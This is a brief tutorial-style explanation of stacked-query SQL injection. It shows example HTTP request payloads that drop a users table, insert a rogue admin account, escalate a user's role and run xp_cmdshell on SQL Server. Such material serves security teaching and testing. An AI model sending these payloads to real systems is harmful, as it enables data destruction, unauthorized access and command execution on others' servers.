Stacked Queries (also called batched queries or piggy-backed queries) is a SQL injection technique where attackers terminate the original query with a semicolon and append additional SQL statements. This enables operations beyond data retrieval, including INSERT, UPDATE, DELETE, or even administrative commands.
Some database drivers allow multiple SQL statements in a single query. By injecting a semicolon followed by arbitrary SQL, attackers can execute completely new commands independent of the original query.
// Original query
SELECT * FROM products WHERE id=1
// Stacked query injection
GET /product?id=1; DROP TABLE users--
// Result: Two queries executed:
// 1. SELECT * FROM products WHERE id=1
// 2. DROP TABLE usersCommon malicious operations:
// Add admin user
GET /product?id=1; INSERT INTO users VALUES('hacker','pass123',1)--
// Modify data
GET /product?id=1; UPDATE users SET role='admin' WHERE user='attacker'--
// Execute system commands (SQL Server)
GET /product?id=1; EXEC xp_cmdshell('whoami')--